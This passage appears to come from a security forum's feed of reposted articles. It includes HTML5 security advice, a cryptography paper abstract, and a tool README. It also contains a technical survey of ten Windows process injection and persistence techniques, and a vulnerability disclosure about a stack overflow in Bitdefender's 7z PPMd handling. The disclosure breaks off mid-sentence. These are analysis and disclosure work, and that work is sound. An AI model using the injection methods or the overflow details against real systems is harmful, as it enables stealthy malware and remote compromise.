Popular Hixie-76 version (hiby-00) and older are outdated and insecure. The recommended version supported in latest versions of all current browsers is RFC 6455 (supported by Firefox 11+, Chrome 16+, Safari 6, Opera 12.50, and IE10). While it's relatively easy to tunnel TCP services through WebSockets (e.g. VNC, FTP), doing so enables access to these tunneled services for the in-browser attacker in case of a Cross Site Scripting attack. These services might also be called directly from a malicious page or program. The protocol doesn't handle authorization and/or authentication. Application-level protocols should handle that separately in case sensitive data is being transferred. Process the messages received by the websocket as data. Don't try to assign it directly to the DOM nor evaluate as code. If the response is JSON, never use the insecure eval() function; use the safe option JSON.parse() instead. Endpoints exposed through the ws:// protocol are easily reversible to plain text. Only wss:// (WebSockets over SSL/TLS) should be used for protection against Man-In-The-Middle attacks. Spoofing the client is possible outside a browser, so the WebSockets server should be able to handle incorrect/malicious input. Always validate input coming from the remote site, as it might have been altered. When implementing servers, check the Origin: header in the Websockets handshake. Though it might be spoofed outside a browser, browsers always add the Origin of the page that initiated the Websockets connection. As a WebSockets client in a browser is accessible through JavaScript calls, all Websockets communication can be spoofed or hijacked through Cross Site Scripting. Always validate data coming through a WebSockets connection. Server-Sent Events Validate URLs passed to the EventSource constructor, even though only same-origin URLs are allowed. As mentioned before, process the messages (event.data) as data and never evaluate the content as HTML or script code. Always check the origin attribute of the message (event.origin) to ensure the message is coming from a trusted domain. Use a whitelist approach. Storage APIs Local Storage Also known as Offline Storage, Web Storage. Underlying storage mechanism may vary from one user agent to the next. In other words, any authentication your application requires can be bypassed by a user with local privileges to the machine on which the data is stored. Therefore, it's recommended not to store any sensitive information in local storage. Use the object sessionStorage instead of localStorage if persistent storage is not needed. sessionStorage object is available only to that window/tab until the window is closed. A single Cross Site Scripting can be used to steal all the data in these objects, so again it's recommended not to store sensitive information in local storage. A single Cross Site Scripting can be used to load malicious data into these objects too, so don't consider objects in these to be trusted. Pay extra attention to “localStorage.getItem” and “setItem” calls implemented in HTML5 page. It helps in detecting when developers build solutions that put sensitive information in local storage, which is a bad practice. Do not store session identifiers in local storage as the data is always accesible by JavaScript. Cookies can mitigate this risk using the httpOnly flag. There is no way to restrict the visibility of an object to a specific path like with the attribute path of HTTP Cookies, every object is shared within an origin and protected with the Same Origin Policy. Avoid host multiple applications on the same origin, all of them would share the same localStorage object, use different subdomains instead. Client-side databases On November 2010, the W3C announced Web SQL Database (relational SQL database) as a deprecated specification. A new standard Indexed Database API or IndexedDB (formerly WebSimpleDB) is actively developed, which provides key/value database storage and methods for performing advanced queries. Underlying storage mechanisms may vary from one user agent to the next. In other words, any authentication your application requires can be bypassed by a user with local privileges to the machine on which the data is stored. Therefore, it's recommended not to store any sensitive information in local storage. If utilized, WebDatabase content on the client side can be vulnerable to SQL injection and needs to have proper validation and parameterization. Like Local Storage, a single Cross Site Scripting can be used to load malicious data into a web database as well. Don't consider data in these to be trusted. Geolocation The Geolocation RFC recommends that the user agent ask the user's permission before calculating location. Whether or how this decision is remembered varies from browser to browser. Some user agents require the user to visit the page again in order to turn off the ability to get the user's location without asking, so for privacy reasons, it's recommended to require user input before calling getCurrentPosition or watchPosition. Web Workers Web Workers are allowed to use XMLHttpRequest object to perform in-domain and Cross Origin Resource Sharing requests. See relevant section of this Cheat Sheet to ensure CORS security. While Web Workers don't have access to DOM of the calling page, malicious Web Workers can use excessive CPU for computation, leading to Denial of Service condition or abuse Cross Origin Resource Sharing for further exploitation. Ensure code in all Web Workers scripts is not malevolent. Don't allow creating Web Worker scripts from user supplied input. Validate messages exchanged with a Web Worker. Do not try to exchange snippets of Javascript for evaluation e.g. via eval() as that could introduce a DOM Based XSS vulnerability. Sandboxed frames Use the sandbox attribute of an iframe for untrusted content. The sandbox attribute of an iframe enables restrictions on content within a iframe. The following restrictions are active when the sandbox attribute is set: All markup is treated as being from a unique origin. All forms and scripts are disabled. All links are prevented from targeting other browsing contexts. All features that triggers automatically are blocked. All plugins are disabled. It is possible to have a fine-grained control over iframe capabilities using the value of the sandbox attribute. In old versions of user agents where this feature is not supported, this attribute will be ignored. Use this feature as an additional layer of protection or check if the browser supports sandboxed frames and only show the untrusted content if supported. Apart from this attribute, to prevent Clickjacking attacks and unsolicited framing it is encouraged to use the header X-Frame-Options which supports the deny and same-origin values. Other solutions like framebusting if(window!== window.top) { window.top.location = location; } are not recommended. Offline Applications Whether the user agent requests permission to the user to store data for offline browsing and when this cache is deleted varies from one browser to the next. Cache poisoning is an issue if a user connects through insecure networks, so for privacy reasons it is encouraged to require user input before sending any manifest file. Users should only cache trusted websites and clean the cache after browsing through open or insecure networks. Progressive Enhancements and Graceful Degradation Risks The best practice now is to determine the capabilities that a browser supports and augment with some type of substitute for capabilities that are not directly supported. This may mean an onion-like element, e.g. falling through to a Flash Player if the <video> tag is unsupported, or it may mean additional scripting code from various sources that should be code reviewed. HTTP Headers to enhance security X-Frame-Options This header can be used to prevent ClickJacking in modern browsers. Use the same-origin attribute to allow being framed from urls of the same origin or deny to block all. Example: X-Frame-Options: DENY For more information on Clickjacking Defense please see the Clickjacking Defense Cheat Sheet. X-XSS-Protection Enable XSS filter (only works for Reflected XSS). Example: X-XSS-Protection: 1; mode=block Strict Transport Security Force every browser request to be sent over TLS/SSL (this can prevent SSL strip attacks). Use includeSubDomains. Example: Strict-Transport-Security: max-age=8640000; includeSubDomains Content Security Policy Policy to define a set of content restrictions for web resources which aims to mitigate web application vulnerabilities such as Cross Site Scripting. Example: Content-Security-Policy: allow 'self'; img-src *; object-src media.example.com; script-src js.example.com Origin Sent by CORS/WebSockets requests. There is a proposal to use this header to mitigate CSRF attacks, but is not yet implemented by vendors for this purpose. Authors and Primary Editors First Last Email Mark Roxberry mark.roxberry [at] owasp.org Krzysztof Kotowicz krzysztof [at] kotowicz.net Will Stranathan will [at] cltnc.us Shreeraj Shah shreeraj.shah [at] blueinfy.net Juan Galiana Lara jgaliana [at] owasp.org Sursa: https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
  14. Nytro

    Fun stuff

    Cu ce ramanem din ce se posteaza pe forum? https://img-9gag-fun.9cache.com/photo/ad9XZjB_460sv.mp4
  15. Farfalle: parallel permutation-based cryptography Guido Bertoni1 , Joan Daemen1,2, Seth Hoffert, Michaël Peeters1 , Gilles Van Assche1 , and Ronny Van Keer1 1 STMicroelectronics 2 Radboud University Abstract. In this paper, we introduce Farfalle, a new permutation-based construction for building a pseudorandom function (PRF). The PRF takes as input a key and a sequence of arbitrarylength data strings, and returns an arbitrary-length output. It has a compression layer and an expansion layer, each involving the parallel application of a permutation. The construction also makes use of LFSR-like rolling functions for generating input and output masks and for updating the inner state during expansion. On top of the inherent parallelism, Farfalle instances can be very efficient because the construction imposes less requirements on the underlying primitive than, e.g., the duplex construction or typical block cipher modes. Farfalle has an incremental property: compression of common prefixes of inputs can be factored out. Thanks to its input-output characteristics, Farfalle is really versatile. We specify simple modes on top of it for authentication, encryption and authenticated encryption, as well as a wide block cipher mode. As a showcase, we present Kџюѣюѡѡђ, a very efficient instance of Farfalle based on Kђѐѐюј-p[1600, nr] permutations and formulate concrete security claims against classical and quantum adversaries. The permutations in the compression and expansion layers of Kџюѣюѡѡђ have only 6 and 4 rounds respectively and the rolling function is lightweight. We provide a rationale for our choices and report on soĞware performance. Download: https://eprint.iacr.org/2016/1188.pdf
      • 1
      • Upvote
  16. Nytro

    JSParser

    JSParser A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting. Dependencies safeurl tornado jsbeautifier Installing $ python setup.py install Running Run handler.py and then visit http://localhost:8008. $ python handler.py Authors https://twitter.com/bbuerhaus/ https://twitter.com/nahamsec/ Inspired By https://twitter.com/jobertabma/ References http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/ http://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/ Changelog 1.0 - Release Sursa: https://github.com/nahamsec/JSParser
  17. Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques Ashkan Hosseini JULY 18, 2017 Process injection is a widespread defense evasion technique employed often within malware and fileless adversary tradecraft, and entails running custom code within the address space of another process. Process injection improves stealth, and some techniques also achieve persistence. Although there are numerous process injection techniques, in this blog I present ten techniques seen in the wild that run malware code on behalf of another process. I additionally provide screenshots for many of these techniques to facilitate reverse engineering and malware analysis, assisting detection and defense against these common techniques. 1. CLASSIC DLL INJECTION VIA CREATEREMOTETHREAD AND LOADLIBRARY This technique is one of the most common techniques used to inject malware into another process. The malware writes the path to its malicious dynamic-link library (DLL) in the virtual address space of another process, and ensures the remote process loads it by creating a remote thread in the target process. The malware first needs to target a process for injection (e.g. svchost.exe). This is usually done by searching through processes by calling a trio of Application Program Interfaces (APIs): CreateToolhelp32Snapshot, Process32First, and Process32Next. CreateToolhelp32Snapshot is an API used for enumerating heap or module states of a specified process or all processes, and it returns a snapshot. Process32First retrieves information about the first process in the snapshot, and then Process32Next is used in a loop to iterate through them. After finding the target process, the malware gets the handle of the target process by calling OpenProcess. As shown in Figure 1, the malware calls VirtualAllocEx to have a space to write the path to its DLL. The malware then calls WriteProcessMemory to write the path in the allocated memory. Finally, to have the code executed in another process, the malware calls APIs such as CreateRemoteThread, NtCreateThreadEx, or RtlCreateUserThread. The latter two are undocumented. However, the general idea is to pass the address of LoadLibrary to one of these APIs so that a remote process has to execute the DLL on behalf of the malware. CreateRemoteThread is tracked and flagged by many security products. Further, it requires a malicious DLL on disk which could be detected. Considering that attackers are most commonly injecting code to evade defenses, sophisticated attackers probably will not use this approach. The screenshot below displays a malware named Rebhip performing this technique. Figure 1: Rebhip worm performing a typical DLL injection Sha256: 07b8f25e7b536f5b6f686c12d04edc37e11347c8acd5c53f98a174723078c365 2. PORTABLE EXECUTABLE INJECTION (PE INJECTION) Instead of passing the address of the LoadLibrary, malware can copy its malicious code into an existing open process and cause it to execute (either via a small shellcode, or by calling CreateRemoteThread). One advantage of PE injection over the LoadLibrary technique is that the malware does not have to drop a malicious DLL on the disk. Similar to the first technique, the malware allocates memory in a host process (e.g. VirtualAllocEx), and instead of writing a “DLL path” it writes its malicious code by calling WriteProcessMemory. However, the obstacle with this approach is the change of the base address of the copied image. When a malware injects its PE into another process it will have a new base address which is unpredictable, requiring it to dynamically recompute the fixed addresses of its PE. To overcome this, the malware needs to find its relocation table address in the host process, and resolve the absolute addresses of the copied image by looping through its relocation descriptors. This technique is similar to other techniques, such as reflective DLL injection and memory module, since they do not drop any files to the disk. However, memory module and reflective DLL injection approaches are even stealthier. They do not rely on any extra Windows APIs (e.g., CreateRemoteThread or LoadLibrary), because they load and execute themselves in the memory. Reflective DLL injection works by creating a DLL that maps itself into memory when executed, instead of relying on the Window’s loader. Memory Module is similar to Reflective DLL injection except the injector or loader is responsible for mapping the target DLL into memory instead of the DLL mapping itself. In a previous blog post, these two in memory approaches were discussed extensively. When analyzing PE injection, it is very common to see loops (usually two “for” loops, one nested in the other), before a call to CreateRemoteThread. This technique is quite popular among crypters (softwares that encrypt and obfuscate malware). In Figure 2, the sample unit test is taking advantage of this technique. The code has two nested loops to adjust its relocation table that can be seen before the calls to WriteProcessMemory and CreateRemoteThread. The “and 0x0fff” instruction is also another good indicator, showing that the first 12 bits are used to get the offset into the virtual address of the containing relocation block. Now that the malware has recomputed all the necessary addresses, all it needs to do is pass its starting address to CreateRemoteThread and have it executed. Figure 2: Example structure of the loops for PE injection prior to calls to CreateRemoteThread Sha256: ce8d7590182db2e51372a4a04d6a0927a65b2640739f9ec01cfd6c143b1110da 3. PROCESS HOLLOWING (A.K.A PROCESS REPLACEMENT AND RUNPE) Instead of injecting code into a host program (e.g., DLL injection), malware can perform a technique known as process hollowing. Process hollowing occurs when a malware unmaps (hollows out) the legitimate code from memory of the target process, and overwrites the memory space of the target process (e.g., svchost.exe) with a malicious executable. The malware first creates a new process to host the malicious code in suspended mode. As shown in Figure 3, this is done by calling CreateProcess and setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004). The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called. Next, the malware needs to swap out the contents of the legitimate file with its malicious payload. This is done by unmapping the memory of the target process by calling either ZwUnmapViewOfSection or NtUnmapViewOfSection. These two APIs basically release all memory pointed to by a section. Now that the memory is unmapped, the loader performs VirtualAllocEx to allocate new memory for the malware, and uses WriteProcessMemory to write each of the malware’s sections to the target process space. The malware calls SetThreadContext to point the entrypoint to a new code section that it has written. At the end, the malware resumes the suspended thread by calling ResumeThread to take the process out of suspended state. Figure 3: Ransom.Cryak performing process hollowing Sha256: eae72d803bf67df22526f50fc7ab84d838efb2865c27aef1a61592b1c520d144 4. THREAD EXECUTION HIJACKING (A.K.A SUSPEND, INJECT, AND RESUME (SIR)) This technique has some similarities to the process hollowing technique previously discussed. In thread execution hijacking, malware targets an existing thread of a process and avoids any noisy process or thread creations operations. Therefore, during analysis you will probably see calls to CreateToolhelp32Snapshot and Thread32First followed by OpenThread. After getting a handle to the target thread, the malware puts the thread into suspended mode by calling SuspendThread to perform its injection. The malware calls VirtualAllocEx and WriteProcessMemory to allocate memory and perform the code injection. The code can contain shellcode, the path to the malicious DLL, and the address of LoadLibrary. Figure 4 illustrates a generic trojan using this technique. In order to hijack the execution of the thread, the malware modifies the EIP register (a register that contains the address of the next instruction) of the targeted thread by calling SetThreadContext. Afterwards, malware resumes the thread to execute the shellcode that it has written to the host process. From the attacker’s perspective, the SIR approach can be problematic because suspending and resuming a thread in the middle of a system call can cause the system to crash. To avoid this, a more sophisticated malware would resume and retry later if the EIP register is within the range of NTDLL.dll. Figure 4: A generic trojan is performing thread execution hijacking Sha256: 787cbc8a6d1bc58ea169e51e1ad029a637f22560660cc129ab8a099a745bd50e 5. HOOK INJECTION VIA SETWINDOWSHOOKEX Hooking is a technique used to intercept function calls. Malware can leverage hooking functionality to have their malicious DLL loaded upon an event getting triggered in a specific thread. This is usually done by calling SetWindowsHookEx to install a hook routine into the hook chain. The SetWindowsHookEx function takes four arguments. The first argument is the type of event. The events reflect the range of hook types, and vary from pressing keys on the keyboard (WH_KEYBOARD) to inputs to the mouse (WH_MOUSE), CBT, etc. The second argument is a pointer to the function the malware wants to invoke upon the event execution.The third argument is a module that contains the function. Thus, it is very common to see calls to LoadLibrary and GetProcAddress before calling SetWindowsHookEx. The last argument to this function is the thread with which the hook procedure is to be associated. If this value is set to zero all threads perform the action when the event is triggered. However, malware usually targets one thread for less noise, thus it is also possible to see calls CreateToolhelp32Snapshot and Thread32Next before SetWindowsHookEx to find and target a single thread. Once the DLL is injected, the malware executes its malicious code on behalf of the process that its threadId was passed to SetWindowsHookEx function. In Figure 5, Locky Ransomware implements this technique. Figure 5: Locky Ransomware using hook injection Sha256: 5d6ddb8458ee5ab99f3e7d9a21490ff4e5bc9808e18b9e20b6dc2c5b27927ba1 6. INJECTION AND PERSISTENCE VIA REGISTRY MODIFICATION (E.G. APPINIT_DLLS, APPCERTDLLS, IFEO) Appinit_DLL, AppCertDlls, and IFEO (Image File Execution Options) are all registry keys that malware uses for both injection and persistence. The entries are located at the following locations: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls HKLM\System\CurrentControlSet\Control\Session Manager\AppCertDlls HKLM\Software\Microsoft\Windows NT\currentversion\image file execution options AppInit_DLLs Malware can insert the location of their malicious library under the Appinit_Dlls registry key to have another process load their library. Every library under this registry key is loaded into every process that loads User32.dll. User32.dll is a very common library used for storing graphical elements such as dialog boxes. Thus, when a malware modifies this subkey, the majority of processes will load the malicious library. Figure 6 demonstrates the trojan Ginwui relying on this approach for injection and persistence. It simply opens the Appinit_Dlls registry key by calling RegCreateKeyEx, and modifies its values by calling RegSetValueEx. Figure 6: Ginwui modifying the AppIniti_DLLs registry key Sha256: 9f10ec2786a10971eddc919a5e87a927c652e1655ddbbae72d376856d30fa27c AppCertDlls This approach is very similar to the AppInit_DLLs approach, except that DLLs under this registry key are loaded into every process that calls the Win32 API functions CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, CreateProcessWithTokenW, and WinExec. Image File Execution Options (IFEO) IFEO is typically used for debugging purposes. Developers can set the “Debugger Value” under this registry key to attach a program to another executable for debugging. Therefore, whenever the executable is launched the program that is attached to it will be launched. To use this feature you can simply give the path to the debugger, and attach it to the executable that you want to analyze. Malware can modify this registry key to inject itself into the target executable. In Figure 7, Diztakun trojan implements this technique by modifying the debugger value of Task Manager. Figure 7: Diztakun trojan modifying IFEO registry key Sha256: f0089056fc6a314713077273c5910f878813fa750f801dfca4ae7e9d7578a148 7. APC INJECTION AND ATOMBOMBING Malware can take advantage of Asynchronous Procedure Calls (APC) to force another thread to execute their custom code by attaching it to the APC Queue of the target thread. Each thread has a queue of APCs which are waiting for execution upon the target thread entering alterable state. A thread enters an alertable state if it calls SleepEx, SignalObjectAndWait, MsgWaitForMultipleObjectsEx, WaitForMultipleObjectsEx, or WaitForSingleObjectEx functions. The malware usually looks for any thread that is in an alterable state, and then calls OpenThread and QueueUserAPC to queue an APC to a thread. QueueUserAPC takes three arguments: 1) a handle to the target thread; 2) a pointer to the function that the malware wants to run; 3) and the parameter that is passed to the function pointer. In Figure 8, Amanahe malware first calls OpenThread to acquire a handle of another thread, and then calls QueueUserAPC with LoadLibraryA as the function pointer to inject its malicious DLL into another thread. AtomBombing is a technique that was first introduced by enSilo research, and then used in Dridex V4. As we discussed in detail in a previous post, the technique also relies on APC injection. However, it uses atom tables for writing into memory of another process. Figure 8: Almanahe performing APC injection Sha256: f74399cc0be275376dad23151e3d0c2e2a1c966e6db6a695a05ec1a30551c0ad 8. EXTRA WINDOW MEMORY INJECTION (EWMI) VIA SETWINDOWLONG EWMI relies on injecting into Explorer tray window’s extra window memory, and has been used a few times among malware families such as Gapz and PowerLoader. When registering a window class, an application can specify a number of additional bytes of memory, called extra window memory (EWM). However, there is not much room in EWM. To circumvent this limitation, the malware writes code into a shared section of explorer.exe, and uses SetWindowLong and SendNotifyMessage to have a function pointer to point to the shellcode, and then execute it. The malware has two options when it comes to writing into a shared section. It can either create a shared section and have it mapped both to itself and to another process (e.g., explorer.exe), or it can simply open a shared section that already exists. The former has the overhead of allocating heap space and calling NTMapViewOfSection in addition to a few other API calls, so the latter approach is used more often. After malware writes its shellcode in a shared section, it uses GetWindowLong and SetWindowLong to access and modify the extra window memory of “Shell_TrayWnd”. GetWindowLong is an API used to retrieve the 32-bit value at the specified offset into the extra window memory of a window class object, and SetWindowLong is used to change values at the specified offset. By doing this, the malware can simply change the offset of a function pointer in the window class, and point it to the shellcode written to the shared section. Like most other techniques mentioned above, the malware needs to trigger the code that it has written. In previously discussed techniques, malware achieved this by calling APIs such as CreateRemoteThread, QueueUserAPC, or SetThreadContext. With this approach, the malware instead triggers the injected code by calling SendNotifyMessage. Upon execution of SendNotifyMessage, Shell_TrayWnd receives and transfers control to the address pointed to by the value previously set by SetWindowLong. In Figure 9, a malware named PowerLoader uses this technique. Figure 9: PowerLoader injecting into extra window memory of shell tray window Sha256: 5e56a3c4d4c304ee6278df0b32afb62bd0dd01e2a9894ad007f4cc5f873ab5cf 9. INJECTION USING SHIMS Microsoft provides Shims to developers mainly for backward compatibility. Shims allow developers to apply fixes to their programs without the need of rewriting code. By leveraging shims, developers can tell the operating system how to handle their application. Shims are essentially a way of hooking into APIs and targeting specific executables. Malware can take advantage of shims to target an executable for both persistence and injection. Windows runs the Shim Engine when it loads a binary to check for shimming databases in order to apply the appropriate fixes. There are many fixes that can be applied, but malware’s favorites are the ones that are somewhat security related (e.g., DisableNX, DisableSEH, InjectDLL, etc). To install a shimming database, malware can deploy various approaches. For example, one common approach is to simply execute sdbinst.exe, and point it to the malicious sdb file. In Figure 10, an adware, “Search Protect by Conduit”, uses a shim for persistence and injection. It performs an “InjectDLL” shim into Google Chrome to load vc32loader.dll. There are a few existing tools for analyzing sdb files, but for the analysis of the sdb listed below, I used python-sdb. Figure10: SDB used by Search Protect for injection purposes Sha256: 6d5048baf2c3bba85adc9ac5ffd96b21c9a27d76003c4aa657157978d7437a20 10. IAT HOOKING AND INLINE HOOKING (A.K.A USERLAND ROOTKITS) IAT hooking and inline hooking are generally known as userland rootkits. IAT hooking is a technique that malware uses to change the import address table. When a legitimate application calls an API located in a DLL, the replaced function is executed instead of the original one. In contrast, with inline hooking, malware modifies the API function itself. In Figure 11, the malware FinFisher, performs IAT hooking by modifying where the CreateWindowEx points. Figure 11: FinFisher performing IAT hooking by changing where CreateWindowEx points to Sha256: f827c92fbe832db3f09f47fe0dcaafd89b40c7064ab90833a1f418f2d1e75e8e CONCLUSION In this post, I covered ten different techniques that malware uses to hide its activity in another process. In general, malware either directly injects its shellcode into another process or it forces another process to load its malicious library. In Table 1, I have classified the various techniques and provided samples to serve as a reference for observing each injection technique covered in this post. The figures included throughout the post will help the researcher recognize the various techniques when reversing malware. Table1: Process injection can be done by directly injecting code into another process, or by forcing a DLL to be loaded into another process Attackers and researchers regularly discover new techniques to achieve injection and provide stealth. This post detailed ten common and emerging techniques, but there are others, such as COM hijacking. Defenders will never be “done” in their mission to detect and prevent stealthy process injection because adversaries will never stop innovating. At Endgame, we constantly research advanced stealth techniques and bring protections into our product. We layer capabilities which detect malicious DLLs that load on some persistence (like AppInit DLLs, COM Hijacks, and more), prevent many forms of code injection in real-time via our patented shellcode injection protection, and detect malicious injected payloads running in memory delivered through any of the above techniques through our patent-pending fileless attack detection techniques. This approach allows our platform to be more effective than any other product on the market in protecting against code injection, while also maximizing resiliency against bypass due to emerging code injection techniques. Sursa: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
      • 2
      • Upvote
  18. July 18, 2017 Bitdefender: Remote Stack Buffer Overflow via 7z PPMD If you read my previous blog post and were bored by it, then this might be for you. With the second post of the series, I am delivering on the promise of discussing a bug that occurs in a more complex setting. A bug in a software module that extracts a prominent archive format (such as 7z) needs to be treated with great caution. It is often critical not only for the software itself, but also for many different software products that are sharing the same library or are based on the same reference implementation. So, does this bug affect Igor Pavlov’s 7z reference implementation1? Well, I believe it does not. However, it would not surprise me if products other than Bitdefender were affected by this. Introduction After having found critical bugs in anti-virus products of smaller vendors, I eventually decided to have a look at Bitdefender’s anti-virus product. Therefore, I started my fuzzing engine and after a couple of hours I had the first crashes, which involved the 7z file format. 7z is quite complex. The file format itself is non-trivial, and the many compression methods it supports are so, too. Fortunately, only some parts of the file format and the so-called PPMd codec are relevant to this bug. PPMd is a compression algorithm originally developed by Dmitry Shkarin2. It makes use of prediction by partial matching3 and combines it with range encoding4. In essence, prediction by partial matching is the idea of building a model that tries to predict the next symbol given the n previous symbols. The context stores the sequence consisting of the last n symbols, and the constant n is called the order of the model. I hope that this basic information will suffice to understand what follows. In case you like to read more about PPM, I strongly recommend the paper by Cleary and Witten5. Alternatively, Mark Nelson’s blog post6is a great read, too. Getting Into the Details Debugging a crash that occurs deep in 7z code of an anti-virus product is a nightmare if you have no symbols. A possible remedy is to take the reference implementation and try to match the function names. Even though Bitdefender seems to reuse7 7-Zip code, it is not exactly trivial to do this, because the compiler has applied a lot of inlining and even interprocedural optimization. Having matched the most important 7-Zip functions, we can step through carefully with WinDbg and easily observe that there is an overflow of the stack-allocated ps buffer in the function CreateSuccessors. In the most recent 7-Zip version, the (first half of the) function looks as follows8. static CTX_PTR CreateSuccessors(CPpmd7 *p, Bool skip) { CPpmd_State upState; CTX_PTR c = p->MinContext; CPpmd_Byte_Ref upBranch = (CPpmd_Byte_Ref)SUCCESSOR(p->FoundState); CPpmd_State *ps[PPMD7_MAX_ORDER]; /* PPMD7_MAX_ORDER==64 */ unsigned numPs = 0; if (!skip) { ps[numPs++] = p->FoundState; } while (c->Suffix) { CPpmd_Void_Ref successor; CPpmd_State *s; c = SUFFIX(c); /* SUFFIX(c) == c->Suffix */ if (c->NumStats != 1) { for (s = STATS(c); s->Symbol != p->FoundState->Symbol; s++); } else { s = ONE_STATE(c); } successor = SUCCESSOR(s); if (successor != upBranch) { c = CTX(successor); if (numPs == 0) return c; break; } ps[numPs++] = s; } /* ### Rest of function omitted. ### */ } We see that the current context (a linked list) is traversed, filling the ps buffer. It is striking that there is no bound check whatsoever. So, if this is the code from the original 7-Zip implementation, can this be correct? Recall that the order of the model is the number of symbols that can be stored in the context. If the context is always updated correctly, it should never contain more elements than the order of the model. So how is a correct update ensured? No matter what the actual mechanism is, it will definitely need to know the order of the model. The name PPMD7_MAX_ORDER is already hinting at the fact that 64 is the maximumorder. The actual order, however, may be different. The 7-Zip source code reveals what we are looking for9. STDMETHODIMP CDecoder::SetDecoderProperties2(const Byte *props, UInt32 size) { if (size < 5) { return E_INVALIDARG; } _order = props[0]; UInt32 memSize = GetUi32(props + 1); if (_order < PPMD7_MIN_ORDER || _order > PPMD7_MAX_ORDER || memSize < PPMD7_MIN_MEM_SIZE || memSize > PPMD7_MAX_MEM_SIZE) return E_NOTIMPL; if (!_inStream.Alloc(1 << 20)) { return E_OUTOFMEMORY; } if (!Ppmd7_Alloc(&_ppmd, memSize, &g_BigAlloc)) { return E_OUTOFMEMORY }; return S_OK; } (Note that this is not the code running in Bitdefender’s engine) We see that the order is read from the props array. As it turns out, this props is read directly from the input file. More specifically, this is the Properties array contained in the Folder structure of 7z’s file format10. Moreover, we see that the reference implementation makes sure that the order is not greater than PPMD7_MAX_ORDER. The order byte of my crashing input is 0x5D, and Bitdefender’s 7z module extracts it anyway. Hence, they omitted this check. This results in a stack buffer overflow. On Attacker Control The attacker can fully control the order byte, the maximum order being 255. This allows her to insert up to 255 pointers into the buffer, 191 of which are out of bound. Those pointers point to CPpmd_State structs of the following type (defined in Ppmd.h). typedef struct { Byte Symbol; Byte Freq; UInt16 SuccessorLow; UInt16 SuccessorHigh; } CPpmd_State; Note that all struct members are attacker controlled. Exploitation and Impact Bitdefender uses a stack canary, as well as ASLR and DEP. Interestingly, they do not seem to use SafeSEH for a large part of the system. The reason for this is that Bitdefender’s core dynamically loads most of its modules (such as the 7z module) from binary plug-in files which are in a proprietary binary format (i.e., they are not Windows DLLs). More specifically, the engine contains a loader that allocates memory, reads the plug-in files from the file system, decrypts and decompresses them, and then finally relocates the code. Hence, they do not use the Windows PE image loader for a large fraction of the executed code, making it very difficult (if not impossible) to use the full SafeSEH protection mechanism. It seems that they work around this restriction by avoiding the use of exceptions within code of their plug-ins.11 The engine runs unsandboxed and as NT Authority\SYSTEM. Moreover, since the software uses a file system minifilter, this vulnerability can be easily exploited remotely, for example by sending an email with a crafted file as attachment to the victim. Note also that Bitdefender’s engine is licensed to many different anti-virus vendors such as F-Secure or G Data, all of which could be affected by this bug.12 The Fix Bitdefender decided to fix the bug by ensuring that the function CreateSuccessors throws an error as soon as the variable numPs (index into the ps buffer) reaches the value PPMD7_MAX_ORDER. They still accept an order greater than PPMD7_MAX_ORDER, but the extraction process aborts at the point just when numPs==PPMD7_MAX_ORDER. This kind of design choice is common practice in the anti-virus industry. They all like to parse and process files in a relaxed fashion. In particular, they are inclined to accept various kinds of (partially) invalid files. The reason for this is essentially that there exist many different variants of consumer software processing popular file formats (such as rar, zip or 7z). The aim of relaxed file parsing and processing is to cover as many implementations as possible, and to avoid the scenario in which the anti-virus product is dismissing a file as invalid that then is successfully processed by some consumer software. Considering this mindset when it comes to invalid files, it may very well be that the check of the PPMd order has been omitted deliberately in the first place. Conclusion We have seen that it can be challenging to incorporate external code into your software without introducing critical bugs. When you cannot avoid using external C/C++ code, you should review it with utmost diligence. This bug, for example, could have been caught quite easily by a thorough review. Note also that it requires a rather involved argument to explain why the buffer in CreateSuccessors cannot overflow, given that the order is not greater than PPMD7_MAX_ORDER. I do not even try to make such an argument, because I believe it should not be required. If the function being free from buffer overflows strongly depends on several other functions and how they update the state, are we not doing something terribly wrong? Do you have any comments, feedback, doubts, or complaints? I would love to hear them. You can find my email address on the about page. Timeline of Disclosure 02/11/2017 - Discovery 02/13/2017 - “Thank you for your report, we will investigate and come back with an answer.” 02/21/2017 - Confirmed and patch rolled out 02/28/2017 - Bug bounty paid Thanks & Acknowledgements I want to thank Bitdefender and especially Marius for their fast response as well as their quick patch. In today’s anti-virus industry, this is (unfortunately) not something that can be taken for granted. Test File If you would like to test quickly whether a 7z implementation might be vulnerable, you can try to let it extract this test archive. It is a 7z archive, containing a file foo.txt which itself contains the ASCII string bar.foo.txt is compressed using PPMd with order 65 (recall that PPMD7_MAX_ORDER==64 in the reference implementation). Note that this file will not cause a stack buffer overflow with the reference implementation even if the order is not checked properly. However, in case a system extracts the file foo.txt successfully (recovering the string bar), this is a strong indication that the order is not checked properly and you should investigate further whether it is vulnerable to the stack buffer overflow or not. http://www.7-zip.org/ [return] http://compression.ru/ds/ [return] https://en.wikipedia.org/wiki/Prediction_by_partial_matching [return] https://en.wikipedia.org/wiki/Range_encoding [return] http://ieeexplore.ieee.org/document/1096090/ [return] http://marknelson.us/1991/02/01/arithmetic-coding-statistical-modeling-data-compression/#part2 [return] Well, the code is very similar, but they changed a few things. For example, they have ported most (if not all) of the C code to C++. [return] CreateSuccessors is located in C/Ppmd7.c of the most recent 7-Zip 17.00. Note that the actual code running in Bitdefender is slightly different. However, I believe that the differences are not relevant to this bug. [return] CDecoder::SetDecoderProperties2 is located in CPP/7zip/Compress/PpmdDecoder.cpp of the most recent 7-Zip 17.00. [return] The 7z file format is documented (partially) in the file DOC/7zFormat.txt of the 7-Zip source package. [return] This requires rewriting a lot of the C++ code that is incorporated into the product. 7-Zip, for example, relies on exceptions at various places. [return] G Data’s anti-virus product is the only one I explicitly checked, and it is definitely affected. Other products are very likely affected, too, if they use 